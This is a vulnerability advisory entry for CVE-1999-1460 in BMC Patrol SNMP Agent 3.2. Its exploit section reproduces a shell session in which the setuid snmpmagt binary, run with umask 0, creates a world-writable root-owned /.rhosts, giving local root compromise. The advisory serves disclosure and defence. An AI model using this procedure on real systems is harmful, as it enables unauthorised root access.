BMC Patrol SNMP Agent File Creation/Permission Vulnerability

Vulnerability ID: 1105491
Vulnerability type: Input validation
Published: 1999-07-14
Updated: 2005-10-20
CVE ID: CVE-1999-1460
CNNVD-ID: CNNVD-199907-015
Platform: Linux
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/19422
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199907-015
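|Vulnerability details
Versions of BMC PATROL SNMP Agent before 3.2.07 contain a vulnerability. A local user can create arbitrary world-writable files as root by specifying the target file as the second argument to the snmpmagt program.
|Exploit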
source: http://www.securityfocus.com/bid/525/info


Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpmagt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts

yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts

Note: If the file exists, it keeps the same perms and overwrites it
with "i^A" then the result of gethostname() and some whitespace. This
problem is not platform dependent and was tested based on out of box
install on an HP.
|References

Source: BID
Name: 525
Link: http://www.securityfocus.com/bid/525
Source: BUGTRAQ
Name: 19990713 Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=93198293132463&w=2
Source: BUGTRAQ
Name: 19990801 Re: Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=93372579004129&w=2
